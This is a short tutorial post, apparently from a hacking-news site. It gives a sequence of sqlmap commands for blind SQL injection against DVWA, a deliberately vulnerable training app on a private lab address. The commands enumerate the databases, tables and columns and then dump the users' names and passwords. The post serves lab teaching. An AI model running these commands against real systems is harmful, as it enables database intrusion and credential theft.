Blind SQL Injection on DVWA using SQLMap

  • 1
  •  
  •  
  •  
  •  
  •  
  •  
  •  
    1
    Share

Here is a video showing you how to perform and Blind SQL injection the vulnerable application is called DVWA and can be downloaded from the following address: http://www.dvwa.co.uk/

The commands I have used can be found below this video

sqlmap -u "http://192.168.0.7/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=dd8c23ee1a95da5a6ac506fef79e2b6c" 
sqlmap -u "http://192.168.0.7/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=dd8c23ee1a95da5a6ac506fef79e2b6c" --dbs
sqlmap -u "http://192.168.0.7/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=dd8c23ee1a95da5a6ac506fef79e2b6c" -D dvwa --tables
sqlmap -u "http://192.168.0.7/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=dd8c23ee1a95da5a6ac506fef79e2b6c" -T users --column
sqlmap -u "http://192.168.0.7/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=dd8c23ee1a95da5a6ac506fef79e2b6c" -C user,password --dump
The following two tabs change content below.

Unallocated Author

Please note that the article you are reading has an unallocated author as the original author is no longer employed at latesthackingnews.com, this has been put in place to adhere with general data protection regulations (GDPR). If you have any further queries, please contact: [email protected]

Unallocated Author

Please note that the article you are reading has an unallocated author as the original author is no longer employed at latesthackingnews.com, this has been put in place to adhere with general data protection regulations (GDPR). If you have any further queries, please contact: [email protected]